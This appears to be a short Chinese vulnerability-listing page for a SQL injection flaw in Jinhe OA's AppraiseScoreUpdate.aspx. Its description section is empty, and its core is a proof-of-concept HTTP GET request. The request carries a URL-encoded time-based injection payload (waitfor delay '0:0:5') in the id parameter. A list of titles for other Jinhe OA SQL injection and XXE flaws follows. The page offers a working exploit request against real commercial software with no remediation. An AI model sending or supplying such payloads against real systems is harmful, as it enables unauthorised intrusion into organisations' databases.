金和OA AppraiseScoreUpdate.aspx SQL注入漏洞

漏洞描述

PoC代码

GET /c6/Jhsoft.Web.Appraise/AppraiseScoreUpdate.aspx/?id=%31%27%77%61%69%74%66%6f%72%20%64%65%6c%61%79%20%27%30%3a%30%3a%35%27%2d%2d HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive

相关漏洞推荐

• 金和OA CustomerImport.aspx 存在XML注入漏洞
• 金和OA blog-XmlDeal XXE漏洞
• 金和OA Jhsoft.Web.blog SQL注入漏洞
• 金和OA XmlPage.aspx 存在XML注入漏洞
• 金和OA ReportSetting.aspx SQL注入漏洞
• 金和OA ReportParaList.aspx SQL注入漏洞
• 金和OA BITypeEdit.aspx SQL注入漏洞
• 金和OA AssTypeSendXML.aspx XXE漏洞
• 金和OA存在SQL注入漏洞
• 金和OA AskDoc.aspx XXE漏洞
• 金和OA AskAttachment.aspx SQL注入漏洞
• 金和OA XmlHttpGetPrintNumber.aspx SQL注入漏洞
• 金和OA Archives-XmlHttp.aspx XXE漏洞